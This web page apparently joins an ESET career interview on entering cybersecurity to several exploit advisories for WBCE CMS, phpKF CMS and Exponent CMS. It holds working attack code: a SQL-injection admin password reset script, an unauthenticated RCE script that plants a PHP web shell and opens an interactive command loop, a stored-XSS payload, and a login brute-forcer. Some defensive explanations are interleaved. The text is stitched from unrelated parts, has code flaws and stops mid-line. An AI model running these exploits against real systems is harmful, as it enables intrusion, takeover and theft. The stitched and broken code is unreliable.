Thursday, January 16, 2025

Cybersecurity careers: What to know and how to get started


Want to help make technology safer for everyone?

Love solving puzzles? Looking for a rewarding career? Break into cybersecurity! Insights from ESET researchers Aryeh Goretsky and Cameron Camp will put you on the right track.
How do you start a career in cybersecurity? What qualifications, certifications and skills do you need? Should you spend half the cost of a house on a top-tier degree? Should you try to hack the Pentagon and get a reputation (which actually carries a whole pile of its own issues, so shouldn’t be pursued wholesale) or build your own Python library that helps cure cancer and try to get noticed?
These are some of the questions ESET folks are asked quite frequently. What better time to try and answer them than Cybersecurity Career Awareness Week, a campaign that runs this week and is part of Cybersecurity Awareness Month? The answers will come from two ESET researchers, who will weigh in on what it took in the past to break into security and what seems to be attracting the attention of companies of all stripes hiring today.

Indeed, demand for security professionals continues to outpace supply. The talent gap remains (de)pressing, not least because, you guessed it, security threats aren’t going anywhere. Nary an organization is immune from the myriad risks associated with cyberattacks, as threats escalate in size and frequency and hit ever closer to home, causing untold damage in the process (and in its aftermath). It’s little wonder, then, that many companies will pay top dollar to bring in and retain security talent, and it seems that the stars are aligned for those willing to seize the opportunities.
There’s more to the equation, though. Read on to find out as we sit down with two ESET experts who’ve worked in the trenches of security for decades – Distinguished Researcher Aryeh Goretsky and Specialized Security Researcher Cameron Camp.

First things first, why choose a career in cybersecurity?
Aryeh: There are the usual reasons for entering the cybersecurity field, such as seeking fame or fortune (or both), but a large part of the appeal to me is that it is one of the very few fields where a single person, armed only with their computer, their wits, and their persistence can actually make a difference in a measurable, noticeable way. Being in cybersecurity means that you have an opportunity (not a guarantee, mind you, but an opportunity) to do something that is impactful and helps others.
Keep in mind, though, that not every success is measured in how many CVEs you are credited for, or how much you have been paid from bug bounty programs. Success is ultimately an individual measurement, and the things you find bring you the most gratification may not be the things which bring you, say, the most attention in the media, social or otherwise.
But, with all that said and kept in mind, entering the practice of cybersecurity gives you access to opportunities that few other professions provide, in terms of both knowledge learned and knowledge applied.
Cameron: Get paid to break stuff for the greater good, move out of your mom’s basement. Terminally curious about how things work? Why do things break? How would you fix broken things, if given a chance? Basically, all the things you got in trouble for around your house growing up provide the impetus for a large portion of the researcher populations’ nascent talent and budding careers. All those things you took apart to find out how they work, much to your mom’s chagrin, could be the fodder for your success. While your popularity around home and school may have been regularly called into question, those same qualities are at home in hardware and software security.
How did you start and what drew you to cybersecurity?
Aryeh: There was nothing particularly magical about how I started, nor was it the result of particularly hard work. All it took was a little initiative and, perhaps, a little luck: I knew John McAfee for several years prior to his starting his eponymous antivirus company. He appeared on the local TV news talking about computer viruses, and I thought, “Wow, that’s cool. I know him.” Then, he appeared a second time, and I realized he might be on to something, business-wise. At the age of 19, with little experience and indeterminate career prospects, I decided to ask him for a job, figuring I could do office work like typing and faxing, which I figured he probably detested and would be happy to farm out. Surprisingly enough, he hired me on the spot, and that’s how I became the first employee at McAfee Associates. After a few minutes spent explaining to me what computer viruses were, I was ready to take my first technical support phone call.
At the time, I knew I wanted to do something with computers, and was going to community college learning about them, but I wasn’t sure what I wanted to do with them, exactly. At McAfee Associates, I had a chance to learn about the very fast-paced business of computer security, and that allowed me to learn more about the underpinnings of hardware, software, and networking. Every day some new bit of knowledge came to me or some insight occurred. Now, over thirty years later, none of that has changed, except for my continued amazement at how the threats—and the defenses against them—have progressed.
Cameron: Celebration of short attention spans. It never felt like ‘real’ work because I was doing things I would’ve probably normally done anyway, and the pace of change is blistering, which makes my caffeine-riddled ADHD heart skip a beat. Really. But also, congealing constellations of seemingly disparate data together with the finest of threads into understanding a system seemed obvious to me, but apparently not to others.
What does your job actually involve? Let’s debunk some stereotypes …
Aryeh: A large portion of my job involves talking to people. Another large portion, and perhaps even a more important one, involves listening to them. Still more time is spent reading, which could be anything from a technical paper to social media to internal documentation. I also, on occasion, write things as well.
One of the things I like about my job is that it has a lot of variability about it. To give an example of how all this talking and listening works out in the real world, in the past week I have:
There are some longer-term ongoing activities I am involved in as well, such as a project with Cameron where we proactively hunt for false positive alarms in our threat detections. Having a false positive occur can be a very debilitating event for a business, so ESET works hard on preventing them.
Also, because it seems like once you do technical support for a living that you never really seem to escape the job, I helped a friend upgrade his installation of ESET Smart Security Premium to the newest version.
Cameron: More corporate/HR type stuff than I thought existed. Taking apart things is fine, but working for a company that sells stuff means you have to put things back together too, and deliver reports that are legible to people who don’t speak binary. That means most people. Or hex. You have to basically make sense to someone who will have a hand in selling or buying something hopefully useful. In short, you have to be a translator back into real-people speak so they’ll give you money, otherwise they stop.

What skills and qualifications do I need?
Aryeh: This is something of a harder question for me to answer, because I entered the field long before there were degrees in cybersecurity, and I also spent the first sixteen years of my career mostly focused on the support side of things.
But I would say that for an entry-level position – that is, one which requires zero to one years of experience – having an understanding of the fundamentals of how a computer’s hardware works, what an operating system does (including a high-level understanding of its various components), and how information is transmitted over networks is going to be a good starting point. If you are going to defend something, having a practical understanding of how it works is going to better help you envision what its weak points are, and how to defend those. With a good understanding of those fundamentals in place, you have a solid foundation on which to increase your knowledge, branch out and explore in the areas that interest you, and further educate yourself—hopefully with the help of your employer through additional skills training, tuition reimbursements and the like.
Cameron: As the industry grows and diversifies by actual job title this continues to change. In future installments we will be able to break this down further. Running backend servers (how I started) is very different than reversing malware. They certainly touch each other and work in the same ecosystem, but have very different daily routines. Either way, learn to natively work in the command line; it’s sort of the essence of what’s happening at a low level that ties everything together, and the pretty screen is just the icing on the digital cake. You’ll need to be comfortable in these kinds of “stripped down” keyboard-only environments, or at least it will put you ahead of others in the field.
Now on to college – should I do it, how much, and is a degree worth it?
Aryeh: Having a college degree can be important as it demonstrates to prospective employers a certain level of academic rigor and commitment, but getting a four-year degree may be impossible for students due to the high cost of secondary education in the United States. One way to ameliorate this is to take your general education courses at a community (two year) college and then transfer to a college or university to finish up your four-year degree. While some candidates worry that this approach may put them at a disadvantage to a hiring manager, it can also demonstrate the ability to execute long-range plans as well as a certain level of fiscal responsibility.
For someone who is mid-career and is looking either to shift careers or for a promotion, getting a master’s or a doctorate can definitely put you on the inside track.
Many employers are offering tuition reimbursement for employees to get a degree in a work-related field, and some offer payback for existing student loans as well. If you are interviewing for a job, be sure to ask about these as well as any other investments your prospective employer makes in their employees’ continuing education and professional development.
Now, with all of that said, I will point out that there are many candidates for whom the traditional four-year college approach is not an option. There are many free and low-cost courses you can take, as well as certifications available that show mastery of a subject. Depending upon whether the position you are interested in is an entry-level one, this might be a faster and less expensive way of getting your foot in the door than a degree.
Cameron: It’s not a bad thing to have, it gives would-be hiring companies some sort of baseline expectation, especially if it’s a brand name institution (you know I’m not going to name them, but you should be able to), assuring them potentially that you have the capacity to grasp the technology at hand and can help them make it better.
But it’s no guarantee. I’ve been in interviews with recently-minted computer science grads who I didn’t believe knew how to do much more than open a laptop. It was embarrassing. For the school and former student. And technology. Just bad. Also, I’ve been around folks who have never driven past a college, but I believe they would be the envy of any tech hiring panel. So it’s no guarantee. But it probably increases the likelihood you’d seem qualified to get you past the first round of the hiring process. But not guaranteed to get you hired.
Is there any best path? What should I study for a career in cybersecurity?
Aryeh: If there’s one thing I hope that I have made clear, there is no one single way that one gets into cybersecurity. I always encourage people who have some knowledge in another area to start by looking at what they are familiar with, and then try thinking about that area in terms of cybersecurity. What are the problems it uniquely faces? How might you solve those problems? Taking what you are already familiar with, and then thinking about how to secure it is a great way to begin bridging your career from its existing path into cybersecurity. And keep in mind, cybersecurity is a very broad field, there’s no one who is an expert in all of it. You want to find a niche that interests you, and focus on that aspect of the field. If you’re not sure exactly what interests you the most, start with your general education around cybersecurity concepts and try everything. Eventually, you will find a portion that is interesting to you, and that is where you should focus your studies.
As I mentioned previously, you need to start with an understanding of what it is you need to protect.  Having a general understanding of computers and networking, or even more specialized training in IT support and systems or network administration, is going to make you a much better cybersecurity practitioner.
Not all jobs in cybersecurity involve programming, but if you are going to be writing code, having a working knowledge of several different programming languages is a great start, because it lets you think about how you could solve a problem in different ways.
Keep in mind, though, that soft skills and skills that are tangential to your role are very important, too.  While you may want to learn all about attacking and defending computers, having an understanding of psychology can help understand an attacker’s motivations. Likewise, being able to communicate clearly, concisely and effectively to both individuals and groups of people is very important, whether it’s justifying the purchase of a new firewall, explaining the impact of a data breach to your C-suite, or asking for a raise.  And, regardless of whether you plan on having your own business or working for someone else, having an understanding of how a business operates can make a big difference, especially if you need to explain things according to the bottom line (e.g., money).
Cameron: It’s almost more important to meet the right people, otherwise you’re a collection of text for HR keyword search. Luckily, there are lots of free (or close) security events where you can reverse engineer what others are using to get jobs. One good way is to find an open-source project and figure out how to contribute to it. This means you have to figure out what projects are popular and widely used, how to get along with others who are working on the project and seem valuable enough for them to think you’re useful, then follow through and do the hard work of contributing something people use. Come to think of it, that’s kind of how a job works. So consider it practice, but without a 401K.

How do I start with little-to-no experience?
Aryeh: I would suggest doing two different things. The first is to focus on learning and building your skills.  This can be done by reading, listening to podcasts, watching videos, and asking questions on social media.  As you learn, take notes, write sample code (if that’s the direction you are moving in) and publish this information in your own personal website(s), such as a blog, wiki, code repository, and so forth. These do not have to be shared publicly, at least initially, but you should create a written record of what you are doing. You can even participate in open-source projects, which are also good for networking (the social kind) from a job’s perspective.
The second part of this is to look for entry-level jobs.  This can be by visiting the careers section of companies that you want to work for, searching the listings of local companies for entry-level positions, or, if you are in school, asking for assistance with career placement.  Your professor may even have some contacts with former students.
Once you submit your résumé or have your first interview, be sure to include links to your personal websites, as these can often show a prospective employer your thought processes, such as how you approach problems, and how you look for solutions.
Cameron: See my open-source comment above.
Certifications – who are they for and do they matter?
Aryeh:  Certifications are important in that they are a rubric for what you know, but I am also a proponent of experience.  In the past decade, we have had a profusion of certs.  While many of them are useful from a measurement perspective, some of them are dubious in value.  They can also be rather expensive, which I feel is a large financial burden to ask from entry-level prospects.  All too often, hiring organizations use degrees and certs as a gating mechanism for prospective hires.  I am not fond of this, because you can end up hiring someone who went to a cram school or who tests well, but has no practical experience and understanding of how things actually work.
While you may want to explore getting some of the least-expensive certs yourself, and they can help set you aside over other candidates for entry level positions, they are probably more useful to look at when hiring mid-range to senior employees, especially when a professional certification may be required for compliance reasons.  Requiring a CISSP, which is a certification for senior-level positions, as a pre-requisite for entry- or junior-level positions is a clear sign that an organization has structural failures, cybersecurity being only one of them.
Cameron: The usual suspects will certainly get you past the initial text scans so common amongst HR department searches. Things like CISSP are certainly near the top of the heap, but you have to match the cert with the intended target. CISSP, for example, is more about security management, whereas some certs are technical like CEH, which is much more focused in scope. So, unless you know your specific audience well, getting certs may mean you’ll just be collecting letters that may or may not result in a job, or at least the one you want. Target well.
To wrap up, how have remote and hybrid work impacted the security talent market? Where do you think we’re headed?
Aryeh: Remote and hybrid work have increased the talent pool in that companies no longer have to hire locally, or offer relocation packages. But it also means the number of applicants for a position have skyrocketed as well, because every job is potentially national or international in the scope of hiring.
A couple of final thoughts I would like to leave people with:
Firstly, that despite what we have heard, we do not necessarily have a huge number of cybersecurity jobs going unfulfilled. While it is easy to talk of a talent gap, it’s also important to understand the salary side of things as well: If there are fewer candidates to draw from, salaries have to go up. What we might have are employers that simply do not want to have to compete by paying high salaries.
And speaking of salaries, your desire may be to do the most technical thing there is to do in whatever part of the cybersecurity field that interests you. But there’s a good chance that the people in sales or legal are going to make far more money.  If amassing a large fortune is what’s important to you, consider wisely what you want to spend your time doing for the next forty years.
Cameron: You still have to build the brand of “You.” But you should be trying to do that anyway, since you’re essentially selling the skills you allege you possess and getting others to agree. Think about online reviews: no one trusts the author of the software near as much as five other random people recommending it. Even if that methodology is weirdly flawed and open to gaming, so will yours be, and that “online score” of You will most certainly be called into the mix when trying to land a job. Also, don’t do Jell-O shots while dancing in a ring of fire on a bar and use that as your picture on LinkedIn. Long after that seemed like a good idea you’ll be paying for it. Even if you did dance in fire with Jell-O and you consider that a relevant skill highlighting your adaptability in a potentially challenging work environment. It’s just not good form and will suggest you lack a certain sensibility. Also, you might be hung over during the interview, which is typically to be avoided unless you work during the early days of certain of our competitors. It’s your work to figure out which one(s).
In either case, curate your brand, whether that’s in real life or on the Internet, the two for you will become increasingly one, so choose carefully.
Thank you for your input!


WBCE CMS 1.5.1 – Admin Password Reset

# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75

import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from my localhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
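The injection above works because the forgot-password handler splices the submitted email address into its SQL text. The following added example (my code, not WBCE's and not the advisory author's) reproduces that pattern on an in-memory SQLite table with constructed rows, beside the parameterized query that closes the hole. The table layout and the `example.invalid` addresses are assumptions; the injected value is the advisory's own payload, URL-decoded.

```python
import sqlite3

# Constructed sample table in the shape the advisory implies (a users table
# with user_id, username and email). It is not WBCE's real schema.
SAMPLE_USERS = [
    (1, "admin", "admin@example.invalid"),
    (2, "alice", "alice@example.invalid"),
]

# The email field from the advisory's POST body, URL-decoded (%27 -> ').
INJECTED_EMAIL = "'/**/or/**/user_id=1/**/or/**/'admin@pylibs.org"


def make_db():
    """Build an in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, email):
    """String concatenation: whatever was submitted becomes part of the SQL.
    With INJECTED_EMAIL the WHERE clause turns into
        email = '' or user_id=1 or 'admin@pylibs.org'
    (the /**/ sequences are empty comments, i.e. whitespace), so the admin row
    matches even though no stored address equals the submitted value."""
    sql = "SELECT user_id, username, email FROM users WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, email):
    """Bound parameter: the driver hands the value to the engine separately
    from the statement, so quotes and comment sequences are compared as text."""
    sql = "SELECT user_id, username, email FROM users WHERE email = ?"
    return conn.execute(sql, (email,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", lookup_vulnerable(db, INJECTED_EMAIL))
    print("parameterized:", lookup_parameterized(db, INJECTED_EMAIL))
```

Running the block shows the concatenated query returning the admin row for a value that matches no stored address, while the bound-parameter version returns nothing. The advisory's writeup title points at a second defect, mailing a stored plaintext password: a handler that only ever mails a short-lived reset token, and stores a salted password hash, has nothing to disclose even if the lookup is subverted.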
            

phpKF CMS 3.00 Beta y6 – Remote Code Execution (RCE) (Unauthenticated)

# Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 18/12/2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.phpkf.com/
# Software Link: https://www.phpkf.com/indirme.php
# Version: 3.00
# Category: Webapps
# Tested on: Linux/Windows

# phpKF-CMS is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.
# It contains an endpoint that allows remote access.
# The necessary checks are not made in the file upload mechanism; only the file extension is checked.
# A file with the ".png" extension can be uploaded and its extension can then be changed.


# Example: python3 exploit.py -u http://example.com
#		   python3 exploit.py -u http://example.com -l admin -p Admin123


from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import json

def main():
	parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')
	parser.add_argument('-u', '--host', type=str, required=True)
	parser.add_argument('-l', '--login', type=str, required=False)
	parser.add_argument('-p', '--password', type=str, required=False)
	args = parser.parse_args()
	print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",
		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
	host(args)


def host(args):
	#Check http or https
	if args.host.startswith(('http://', 'https://')):
		print("[?] Check Url...\n")
		sleep(2)
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		else:
			pass
	else:
		print("\n[?] Check Adress...\n")
		sleep(2)
		args.host = "http://" + args.host
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		else:
			pass


	# Check Host Status
	try:
		response = requests.get(args.host)
		if response.status_code == 200:
			if args.login == None and args.password == None:
				create_user(args)
			else:
				login_user(args)
		else:
			print("[-] Address not reachable!")
			sleep(2)

	except requests.ConnectionError as exception:
		print("[-] Address not reachable!")
		sleep(2)
		exit(1)


def create_user(args):
	print("[*] Create User!\n")
	sleep(2)
	url = args.host + "/phpkf-bilesenler/kayit_yap.php"
	headers = {
			"Origin": args.host,
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Referer": "http://fuzzing.com/uye-kayit.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = {
			"kayit_yapildi_mi": "form_dolu",
			"oturum": '', "kullanici_adi": "evil",
			"sifre": "Evil123",
			"sifre2": "Evil123",
			"posta": "evil@localhost.com",
			"kosul": "on"
	}
	response = requests.post(url, headers=headers, data=data, allow_redirects=True)
	args.login = ("evil")
	args.password = ("Evil123")
	print("[+] " + args.login + ":" + args.password + "\n")
	sleep(2)
	login_user(args)



def login_user(args):
	url = args.host + "/uye-giris.php"
	headers = {
			"Origin": args.host,
			"Content-Type": "application/x-www-form-urlencoded",
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
			"Referer": args.host + "/uye-giris.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = {
			"kayit_yapildi_mi": "form_dolu",
			"git": args.host + "/index.php",
			"kullanici_adi": args.login,
			"sifre": args.password,
			"hatirla": "on"
	}
	response = requests.post(url, headers=headers, data=data, allow_redirects=False)
	token = response.cookies.get("kullanici_kimlik")
	if (token != None):
		print("[!] Login Success!\n")
		sleep(2)
		upload_evil(args, token)
	else:
		if args.login == "evil" and args.password == "Evil123":
			print("[!] Unauthorized user!\n")
			print("[!] manually add a user and try again\n")
			print("[!] Go to link " + args.host + "/uye-kayit.php\n")
			print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'")
			sleep(2)
		else:
			print("[!] Unauthorized user!\n")
			sleep(2)


def upload_evil(args, token):
	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
	cookies = {
			"kullanici_kimlik": token,
			"dil": "en"
	}
	headers = {
			"VERICEK": "",
			"DOSYA-ADI": "evil.png",
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Content-type": "application/x-www-form-urlencoded; charset=utf-8",
			"Accept": "*/*",
			"Origin": args.host,
			"Referer": args.host + "/oi_yaz.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"
	response = requests.post(url, headers=headers, cookies=cookies, data=data)

	if (response.text == "yuklendi"):
		print("[!] Upload Success!\n")
		sleep(2)
		change_name(args, token)
	else:
		print("[!] Upload Failed!\n")
		sleep(2)


def change_name(args, token):
	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
	cookies = {
			"kullanici_kimlik": token,
			"dil": "en"
	}
	headers = {
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
			"Accept": "*/*",
			"Origin": args.host,
			"Referer": args.host + "/oi_yaz.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = {
			"yenidenadlandir": "evil.png|evil.php",
			"vericek": "/"
	}
	response = requests.post(url, headers=headers, cookies=cookies, data=data)
	if (response.text == "Name successfully changed..."):
		print("[!] Change Name evil.php!\n")
		sleep(2)
		find_dict(args, token)
	else:
		print("[!] Change Failed!\n")
		sleep(2)

def find_dict(args, token):
	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
	cookies = {
			"kullanici_kimlik": token,
			"dil": "en"
	}
	headers = {
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
			"Accept": "*/*",
			"Origin": args.host,
			"Referer": args.host + "/oi_yaz.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = {
			"vericek": "/",
			"dds": "0"
	}
	response = requests.post(url, headers=headers, cookies=cookies, data=data)
	if (response.text == "You can not upload files!"):
		print("[!] File not found!\n")
		sleep(2)
	else:
		print("[!] Find Vuln File!\n")
		sleep(2)
		soup = BeautifulSoup(response.text, 'html.parser')
		path = soup.find("div").contents[1].replace(" ", "")
		exploit(args, path)


def exploit(args, path):
	print("[+] Exploit Done!\n")
	sleep(2)

	while True:
		cmd = input("$ ")
		url = args.host + path + "evil.php?cmd=" + cmd
		headers = {
			"Upgrade-Insecure-Requests": "1",
			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
		}

		response = requests.post(url, headers=headers, timeout=5)

		if response.text == "":
			print(cmd + ": command not found\n")
		else:
			print(response.text)


if __name__ == '__main__':
	main()
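The header comments of the script describe the two weaknesses it chains: the upload component inspects only the file extension, and the rename action imposes no policy on the new name. The following added example (my code, not phpKF's and not the exploit author's) models both policies side by side so the difference can be checked. The allowlist, the magic-byte table and the sample file bodies are constructed, and `simulate` stands in for the upload-then-rename sequence rather than any real endpoint.

```python
import secrets

# Extensions the upload endpoint is meant to accept (constructed allowlist).
ALLOWED_EXT = {"png", "jpg", "gif"}

# Leading bytes each format starts with. A weak signal on its own: a body can
# carry a valid image header and still contain PHP text further down.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "gif": b"GIF8"}

# Constructed sample bodies: PHP-looking text and a minimal PNG prefix.
PHP_TEXT = b"<?php echo 'constructed sample'; ?>"
PNG_BYTES = MAGIC["png"] + b"\x00" * 16


def ext_of(name):
    """Lower-cased text after the last dot, or '' if there is none."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def weak_upload_check(filename, content):
    """The pattern the advisory describes: only the extension is inspected."""
    return ext_of(filename) in ALLOWED_EXT


def weak_rename_check(old_name, new_name):
    """The advisory's rename step: any target name is accepted."""
    return True


def strong_upload_check(filename, content):
    """Extension must be allowlisted and the body must start like that type."""
    ext = ext_of(filename)
    return ext in ALLOWED_EXT and content.startswith(MAGIC[ext])


def strong_rename_check(old_name, new_name):
    """A rename may not change the extension, leave the allowlist, or add path
    components, so the .png -> .php hop the advisory relies on is refused."""
    if "/" in new_name or "\\" in new_name or ".." in new_name:
        return False
    return ext_of(new_name) == ext_of(old_name) and ext_of(new_name) in ALLOWED_EXT


def server_assigned_name(filename):
    """Discard the client's basename entirely; keep only the validated extension."""
    return secrets.token_hex(8) + "." + ext_of(filename)


def simulate(upload_check, rename_check, filename, content, new_name=None):
    """Run an upload and an optional rename under a policy pair. Returns the
    name the file is stored under, or None if the upload was refused; a
    refused rename keeps the old name."""
    if not upload_check(filename, content):
        return None
    stored = filename
    if new_name is not None and rename_check(stored, new_name):
        stored = new_name
    return stored


if __name__ == "__main__":
    print("weak policy  :", simulate(weak_upload_check, weak_rename_check, "evil.png", PHP_TEXT, "evil.php"))
    print("strong policy:", simulate(strong_upload_check, strong_rename_check, "evil.png", PHP_TEXT, "evil.php"))
    print("strong, real PNG renamed to .php:", simulate(strong_upload_check, strong_rename_check, "pic.png", PNG_BYTES, "pic.php"))
```

The polyglot case in the test, a body that starts with a PNG header and carries PHP text after it, passes the stronger content check, so the rename rule and a server-assigned basename do the real work. The remaining control, which no filename policy replaces, is to serve the upload directory from a location where the web server does not execute scripts.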
            

Exponent CMS 2.6 – Multiple Vulnerabilities

# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Author: heinjame
# Date: 22/10/2021
# Exploit Author: picaro_o
# Vendor Homepage: https://www.exponentcms.org/
# Version: <=2.6
# Tested on: Linux os

*Stored XSS*

Affected parameter: http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title, Text Block)

Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
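Why this payload survives a keyword filter: the `onload` attribute name is written as the numeric character references `&#111;&#110;`, which a filter inspecting the stored string does not recognise but which the browser decodes before it evaluates the attribute. The added example below (my code, not part of the advisory or of Exponent CMS) contrasts a blocklist filter with output encoding, using the advisory's payload; the filter regex and the helper names are my own assumptions.

```python
import html
import re

# The stored-XSS payload from the advisory above.
PAYLOAD = '<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">'

# What a blocklist filter typically hunts for: an inline event-handler
# attribute such as onload= or onerror= (assumed pattern, not Exponent's).
EVENT_HANDLER = re.compile(r"\bon\w+\s*=", re.IGNORECASE)


def strip_event_handlers(markup):
    """Blocklist approach: delete anything that looks like on...= in the
    stored string. The payload comes back untouched, because its handler
    name is spelled with character references (&#111;&#110; decodes to 'on')."""
    return EVENT_HANDLER.sub("", markup)


def decode_once(value):
    """One round of character-reference decoding, as a browser performs on an
    attribute value before using it (here, before loading the iframe's data: URL)."""
    return html.unescape(value)


def handler_visible_to_browser(attribute_value):
    """True if an event handler is present after the browser's decoding step."""
    return EVENT_HANDLER.search(decode_once(attribute_value)) is not None


def encode_for_html(text):
    """Output encoding: <, >, &, " and ' become references, so the stored
    value renders as visible text and is never parsed as markup."""
    return html.escape(text, quote=True)


def is_markup(rendered):
    """True if the string still contains a raw tag delimiter."""
    return "<" in rendered or ">" in rendered


if __name__ == "__main__":
    filtered = strip_event_handlers(PAYLOAD)
    print("after blocklist filter :", filtered)
    print("browser sees a handler :", handler_visible_to_browser(filtered))
    print("after output encoding  :", encode_for_html(PAYLOAD))
```

The filter and the browser disagree about what the string contains, which is the general reason blocklists on stored input fail. Encoding at the point of output removes the disagreement: what reaches the parser has no tag delimiters at all, and decoding it once yields the payload as literal text on the page.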

*Database credentials are disclosed in response*

POC
```
var adminerwindow = function (){
    var win = window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
    if (!win) { err(); }
}
```

*Authentication Bruteforce*
```
import argparse
import requests
import sys

parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("Username list", help="Username List")
parser.add_argument("Password list", help="Password List")
pargs = parser.parse_args()

host = sys.argv[1]
userlist = sys.argv[2]
passlist = sys.argv[3]

try:
    readuser = open(userlist)
    readpass = open(passlist)
except:
    print("Unable to load files")
    exit()
def usernamebrute():
    s = requests.Session()
    for username in readuser.readlines():
        brute={
                'controller':(None,'users'),
                'src':(None,''),
                'int':(None,''),
                'action':(None,'send_new_password'),
                'username':(None,username.strip()),
        }
        bruteforce = s.post(host+"/index.php",files=brute)
        status = s.get(host+"/users/reset_password")
        if "administrator" in status.text:
            print("[+] Found username : "+ username)
            adminaccount = username.strip()
            checkpoint = True
            return adminaccount,checkpoint
    # No match in the list: return a pair so the caller's unpacking does not fail
    return None,False

def passwordbrute(adminaccount):
    s = requests.Session()
    s.cookies.set("csrftoken", "abc")
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
        'Referer': host+'/login/showlogin'
    }
    for password in readpass.readlines():
        brute={
                'controller':'login',
                'src':'',
                'int':'',
                'action':'login',
                'username':adminaccount,
                'password':password.strip()
        }
        bruteforce = s.post(host+"/index.php",headers=header,data=brute)
        # print(bruteforce.text)
        status = s.get(host+"/login/showlogin",cookies=csrf)
        print(status.text)
        if "Invalid Username / Password" not in status.text:
            print("[+] Found Password : "+ password)
            break

adminaccount,checkpoint = usernamebrute()
if checkpoint == True:
    passwordbrute(adminaccount)
else:
    print("Can't find username,We can't proceed sorry :(")

```
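A defender's counterpart to the script above, added here as example code (not part of the original advisory and not Exponent CMS code): a small detector that reads web-server access log lines and flags the two request patterns the script produces, a burst of POSTs to the login endpoint and repeated reads of /users/reset_password from one client. The combined log format, the thresholds and the sample log lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" log format (assumption: the CMS sits behind such a server).
LOG_RE = re.compile(
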